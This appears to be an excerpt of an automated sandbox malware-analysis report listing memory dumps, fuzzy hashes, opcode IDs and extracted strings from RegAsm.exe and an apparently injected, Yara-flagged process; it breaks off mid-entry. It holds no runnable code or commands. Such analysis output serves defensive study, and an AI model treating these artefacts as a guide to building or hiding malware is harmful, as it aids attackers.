                                                  • Instruction Fuzzy Hash: EC900269742441566545B1984414507400697E0241795C012A3428950C8966A96AD632
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d52dcf2637f8815b2f1e3e74d0fee6b9cc4b5553e90b09267c9c25aff21120fd
                                                  • Instruction ID: 6af1084399bc2687f192008c29b8cf8a87ce61783382fe6d31592d40087274f9
                                                  • Opcode Fuzzy Hash: d52dcf2637f8815b2f1e3e74d0fee6b9cc4b5553e90b09267c9c25aff21120fd
                                                  • Instruction Fuzzy Hash: 1390026970544446E10075985418A07000587D0205F55D011A3078595DCA759965A132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ca056ee40886c91eaad8ad1fea4d103c76aa2ff397375f724ed4a18cb50dd62
                                                  • Instruction ID: 80458c13739689d7b6c8015523bb078801913b44f281db710c4bfcd00dd54277
                                                  • Opcode Fuzzy Hash: 1ca056ee40886c91eaad8ad1fea4d103c76aa2ff397375f724ed4a18cb50dd62
                                                  • Instruction Fuzzy Hash: 6290026D71340006E1807198541860B000587D1202F95D415A2029558CCD55997D5332
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 088074ca358a4607356ed587b6203602f9d491f41fe6d7ba7d005adb7c20567a
                                                  • Instruction ID: 7a7533be4be8bde5a5eb6245f58ee7b55cda2cba255fcac28d3ec7a18b348072
                                                  • Opcode Fuzzy Hash: 088074ca358a4607356ed587b6203602f9d491f41fe6d7ba7d005adb7c20567a
                                                  • Instruction Fuzzy Hash: AC90026970140007E140719854286074005D7E1301F55D011E2428554CDD55996A5233
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbdbffbebea413f324f8ed6b0f374eb9b62a307bf7f95cece7990a58781c1a70
                                                  • Instruction ID: d8670fa1d30cc8d398926b5ceab309bdc7bae524695c3c9dcc8dbd4d5792c7a6
                                                  • Opcode Fuzzy Hash: dbdbffbebea413f324f8ed6b0f374eb9b62a307bf7f95cece7990a58781c1a70
                                                  • Instruction Fuzzy Hash: FF90026974140806E140719884247070006C7D0601F55C011A2038554D8A569A7966B2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aa041e1fe0a8416de6327536dd57b6df424847780bcacee83a426a8da077ab7
                                                  • Instruction ID: b66f88d8c641ebed10d5b98966de63232d234272adc40c21910f97030f695503
                                                  • Opcode Fuzzy Hash: 5aa041e1fe0a8416de6327536dd57b6df424847780bcacee83a426a8da077ab7
                                                  • Instruction Fuzzy Hash: 0E90026970184446E14072984814B0F410587E1202F95C019A616A554CCD5599695732
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 140065acca93ebc4cf830b3962a1f1f3ce8f1ef0ef94cb58506ce8994172281b
                                                  • Instruction ID: 835559836f78d35e26af1c06b84a95d3008d95aba9fcdb62362b2c2a2f2564d9
                                                  • Opcode Fuzzy Hash: 140065acca93ebc4cf830b3962a1f1f3ce8f1ef0ef94cb58506ce8994172281b
                                                  • Instruction Fuzzy Hash: 4490026974545106E150719C44146174005A7E0201F55C021A2828594D899599696232
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5be3a5977cfa48516ee8525161a5d81359959e121e384e1306905d2212597907
                                                  • Instruction ID: b218e583899f555257394bcf1ca0129641c67382d010f05fdde5ee34ce282bc8
                                                  • Opcode Fuzzy Hash: 5be3a5977cfa48516ee8525161a5d81359959e121e384e1306905d2212597907
                                                  • Instruction Fuzzy Hash: AE90027970240146A54072985814A4F410587E1302B95D415A2029554CCD5499755232
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1238424fa45f864ba14e94f2fb148db00e0a1c4453303cb1da774ec96bc959ca
                                                  • Instruction ID: f1570cfea226ab6c4bedd5206168b8219736e31069c178bb902e20a25923a2ce
                                                  • Opcode Fuzzy Hash: 1238424fa45f864ba14e94f2fb148db00e0a1c4453303cb1da774ec96bc959ca
                                                  • Instruction Fuzzy Hash: D990027D70140406E51071985814647004687D0301F55D411A2438558D8A9499B5A132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 0cd0a1ee56f45e70b6e6b1a258f71593a40cdef7185bd120e8c5a1d6fa959867
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 7194f2f84d351c3a7d0bb8c2ab88ac6e9d2a4930d8199dd3f7795bcf0509f9dd
                                                  • Instruction ID: 5879a352036e0831284cb2b73a4e7adad06271d6d9336e9c19c86077780dfe72
                                                  • Opcode Fuzzy Hash: 7194f2f84d351c3a7d0bb8c2ab88ac6e9d2a4930d8199dd3f7795bcf0509f9dd
                                                  • Instruction Fuzzy Hash: 2851E5BEA0011ABFDF14DF988890A7EF7B8BB48205714C169E8A9D3645D734DE40CBA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 7646420ee3151eacfd39fd86063a7e49f875223b138dc884b0573ac70b97e50c
                                                  • Instruction ID: b5dcb71be83f79cf27316211e0225865ca4973d48d1ac30f0bbc0f7c7c640d98
                                                  • Opcode Fuzzy Hash: 7646420ee3151eacfd39fd86063a7e49f875223b138dc884b0573ac70b97e50c
                                                  • Instruction Fuzzy Hash: 3051F879E00649AFDB30DF5CC8E497FB7FD9B44204B14846AE89AD7681DB74DA40CB60
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 028C4742
                                                  • Execute=1, xrefs: 028C4713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 028C4787
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 028C4725
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 028C46FC
                                                  • ExecuteOptions, xrefs: 028C46A0
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 028C4655
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 9b7aaeb014750103b3aa4e1086d7929562b45846ba7fd1b4cec0be5559e20699
                                                  • Instruction ID: e853a64d98027ea158391900335985d9e1418c0c36d7331cff497e6f07296a88
                                                  • Opcode Fuzzy Hash: 9b7aaeb014750103b3aa4e1086d7929562b45846ba7fd1b4cec0be5559e20699
                                                  • Instruction Fuzzy Hash: D351283DA4021D7AEF21FBA8DC95FA9B3B9AF04708F2400A9D509E7281E7709A45CF51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction ID: bc009554fdab4ca6b3c5754db364267e0cc9089877625d5fe11dd46e12af05b0
                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction Fuzzy Hash: 21022575508351AFC705DF18C890E6BBBEAEFC8704F04892DF9959B268DB31E909CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction ID: 26e726e94b92fd5b016d6a0f8ccaae1c71e649e7874318c000dff6427407bf01
                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction Fuzzy Hash: 9D81CD7CA05249AFDF25CF68E8917FEBBA2AF4435CF1C4219E865E7291C731A840CB51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: a576997ff5918a14f32af37230af22f922f32b49048a0a199ec49d60c8080085
                                                  • Instruction ID: 84bb98788c509b218df5be4e753785f2e80051fbc4e862d7a899344790225aa2
                                                  • Opcode Fuzzy Hash: a576997ff5918a14f32af37230af22f922f32b49048a0a199ec49d60c8080085
                                                  • Instruction Fuzzy Hash: E821517AE0021DAFDB50DF79C894AAEBBFDAF44744F040126ED45E3240EB30D9018BA1
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 028C02E7
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 028C02BD
                                                  • RTL: Re-Waiting, xrefs: 028C031E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: df4269ab3542d7a0a3f987ed1b21769f5e0c20ab6a6297e14f101cb64c468705
                                                  • Instruction ID: c8bf0be64074750543de8a7cbe04bf9813c1163690bb8bf5bb542ad2ecd5777f
                                                  • Opcode Fuzzy Hash: df4269ab3542d7a0a3f987ed1b21769f5e0c20ab6a6297e14f101cb64c468705
                                                  • Instruction Fuzzy Hash: D7E1AB3C608741DFD725CF29C884B2AB7E1AB94358F240A5DF6A9CB6E1D774D844CB42
                                                  Strings
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 028C7B7F
                                                  • RTL: Resource at %p, xrefs: 028C7B8E
                                                  • RTL: Re-Waiting, xrefs: 028C7BAC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: aa9c8cee8766695414dcd98bbd0c6d5fb3c9e9c9062097e577e0245b150cbdc7
                                                  • Instruction ID: bf353eb08b1ae857318092445794f5cbe58cc3e5b3afdb3e65bab8a6b1a73d42
                                                  • Opcode Fuzzy Hash: aa9c8cee8766695414dcd98bbd0c6d5fb3c9e9c9062097e577e0245b150cbdc7
                                                  • Instruction Fuzzy Hash: C241B03D7007029FD724EE29C840B6AB7E5EF89718F100A1DF95AD7A80DB71E8058F91
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028C728C
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 028C72A3
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 028C7294
                                                  • RTL: Re-Waiting, xrefs: 028C72C1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: faae03c02c7d9370f3876087403c19c58ae2f81b1d2bbf3259db106efbc6613e
                                                  • Instruction ID: 0f29b3f8773ed9549f7ea2d9164431d47361533e254c7a80800fab7aa24c5af6
                                                  • Opcode Fuzzy Hash: faae03c02c7d9370f3876087403c19c58ae2f81b1d2bbf3259db106efbc6613e
                                                  • Instruction Fuzzy Hash: 5C41F03D700246ABD720DE29CC41B6AB7A9FF94718F244619F95AEB240DB31E846CBD1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 9a4a5fc963a18a19278df34e03e3ba48cfed910c71f3e17db0914c757d046b7a
                                                  • Instruction ID: 1f071c9d8e0bebf8766d89ca0242dfbf2033addeed353c1077271ce1a3d1302d
                                                  • Opcode Fuzzy Hash: 9a4a5fc963a18a19278df34e03e3ba48cfed910c71f3e17db0914c757d046b7a
                                                  • Instruction Fuzzy Hash: DE315476A0021D9FDB20DF29CC94BEEB7FDEB44614F544555EC49E3280EB309A458FA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction ID: ca0421d34761d31b92ee04f1aa2567320b7bac7c770d1b7beb8b08d87817fc08
                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction Fuzzy Hash: 619192BCE1021A9EDF24DE69C8817BEF7A5AF44724F1C461AE859EB6C0E7309940CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 34c1973263fb776393b44b02a76c6fa28f3ffb7519368d1d14181ec595c9f7e2
                                                  • Instruction ID: d4ed3dbdc21577f509c9d35df9195418ff4976377fe61ec7c9767ec8de100214
                                                  • Opcode Fuzzy Hash: 34c1973263fb776393b44b02a76c6fa28f3ffb7519368d1d14181ec595c9f7e2
                                                  • Instruction Fuzzy Hash: 1F810AB9D402699BDB268B54CC44BEEB6B8AF49754F0041DAEA1DF7240D7309E84CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X$#$$g$)y$6f$7>$9$9z$I$OY$]'$_:$$
                                                  • API String ID: 0-1456910488
                                                  • Opcode ID: d68637827661577542a4a293dd6c73c7b465c7517858e60462967384838a17c7
                                                  • Instruction ID: dbb9019ec41dc01966afde0eaff785dd35302dc5d5d69c9feb2cea0f88a0f5a6
                                                  • Opcode Fuzzy Hash: d68637827661577542a4a293dd6c73c7b465c7517858e60462967384838a17c7
                                                  • Instruction Fuzzy Hash: 5122D1B8E05269CFDB24CF48C9947DDBBB1BF85308F2481D9D149AB281C7B59A86CF41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$O$S$\$s
                                                  • API String ID: 0-3854637164
                                                  • Opcode ID: a9c1c934cea71200e13a4ac6e07a757bd777cbdaac0b6ce278ceae7c9551d13d
                                                  • Instruction ID: 98131689aec66b4ec5aa627430a7ecc7575534bc97a1c703c314fcdc8cf7c9f5
                                                  • Opcode Fuzzy Hash: a9c1c934cea71200e13a4ac6e07a757bd777cbdaac0b6ce278ceae7c9551d13d
                                                  • Instruction Fuzzy Hash: E85183BA900218AADF10EF99DD88BEEB379EF44714F048199ED0D97100E7755A58CFA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ~P
                                                  • API String ID: 0-2601391987
                                                  • Opcode ID: 8bb546077eac862019745f391fb40bccae899c441ae38dac4d60f0b046aeef6a
                                                  • Instruction ID: 75f604d6b71aa0cf1e5f018f952aa2a36619ad4b5989362a7bb79007a29c646c
                                                  • Opcode Fuzzy Hash: 8bb546077eac862019745f391fb40bccae899c441ae38dac4d60f0b046aeef6a
                                                  • Instruction Fuzzy Hash: 2921F1B6D0121CAF8B04DFA9D9419EFB7F9EF88200F10455AE919E7200E7759A14CFE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ok
                                                  • API String ID: 0-3965254117
                                                  • Opcode ID: a91e6bb513452a9a8d83d0aa560c473b02efa44b7ad7666c4ff0e1a811d56664
                                                  • Instruction ID: 4d4cf9d013ce1cd1396babbff0b69b44b34e09a04d8e20fd0e43b98c441e5fd5
                                                  • Opcode Fuzzy Hash: a91e6bb513452a9a8d83d0aa560c473b02efa44b7ad7666c4ff0e1a811d56664
                                                  • Instruction Fuzzy Hash: BC011BB6C01218AF8F41DFE8D9449EEBBF9AB08300F14816EE519F3200E77056048FA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 98d8424ebdea5deac2103d640455a2bce1fdaacccaf086ba76f5fbcd030fb204
                                                  • Instruction ID: ab49c10de296e1e2635d970d99d0c9a3f839004f7490ff924a37254aca0889a2
                                                  • Opcode Fuzzy Hash: 98d8424ebdea5deac2103d640455a2bce1fdaacccaf086ba76f5fbcd030fb204
                                                  • Instruction Fuzzy Hash: 4F4101B5D11219AFDB00DF99DC81AEEBBBCEF49710F10415AFA18E6240E7709641CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c4d37d6829072e019189b5cc151e068c0d758a884caf786c9d1940f1e6d455a
                                                  • Instruction ID: af3a4b3ac77e2526f434b5c769e1de901326a3dcaa2005772637aa00d8a25444
                                                  • Opcode Fuzzy Hash: 6c4d37d6829072e019189b5cc151e068c0d758a884caf786c9d1940f1e6d455a
                                                  • Instruction Fuzzy Hash: 273116B9A00649ABCB14DF99CC40EEFB7F9EF89304F108219F919A7240D774A815CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9db1b6f11d2acfb1b3a9fd3f5e06dbd059e911a8bde8cfbafebf616cbf0c62c5
                                                  • Instruction ID: a6ac56a491673d55981fbbf1151cf2f94b3aa36b602c235b9373813f4be01476
                                                  • Opcode Fuzzy Hash: 9db1b6f11d2acfb1b3a9fd3f5e06dbd059e911a8bde8cfbafebf616cbf0c62c5
                                                  • Instruction Fuzzy Hash: 3F2136B9A00648ABDB14DF98CC41FAFB7A9EF89700F104109FE19AB240D774A911CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6f5d697bc38e1ee26ffc95ba4928b708590eea8516fa1d4412e12ec7decf9b9
                                                  • Instruction ID: 0a6cbf2576fd9d1cb8e134b677d2a797debbb6293ecbd784a10a39ea155da767
                                                  • Opcode Fuzzy Hash: c6f5d697bc38e1ee26ffc95ba4928b708590eea8516fa1d4412e12ec7decf9b9
                                                  • Instruction Fuzzy Hash: C211A37A3802447AFB209A599C82FAB335D9B85F10F244008FB1CEE1C0D6A5B8118AB5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21106eb5ceeca8892c75dbebf12ee49aa38b3bdb6838568f2f96fd6c839bc806
                                                  • Instruction ID: 2d46ea765b0133e9c0a787eead2ef067876a8365212ff34d864bee53671c49ae
                                                  • Opcode Fuzzy Hash: 21106eb5ceeca8892c75dbebf12ee49aa38b3bdb6838568f2f96fd6c839bc806
                                                  • Instruction Fuzzy Hash: BD114C79A00748ABDB14EB58CC45FBF73A9EF85704F104509FA199B280E7746901CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92c9041de972db01f374b8b10d72fc79274d392b9dfbfa6944faa41ed44dca7b
                                                  • Instruction ID: 40ab7bba09822469acbfda0418d30276ad49820fa80193a25b7ebfef2d5fb584
                                                  • Opcode Fuzzy Hash: 92c9041de972db01f374b8b10d72fc79274d392b9dfbfa6944faa41ed44dca7b
                                                  • Instruction Fuzzy Hash: 691160799003586BDB14EB58CC45FFFB7A9EF86704F00440DFA59AB280E7746900CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f660786144a0dcc073b6e3cdd037f0496482bee28493ab4739367fe7d3f80def
                                                  • Instruction ID: 4500cb32040f64c9c841b972ac34a21c1c781a4c42c50afd197554b7edd8f0d8
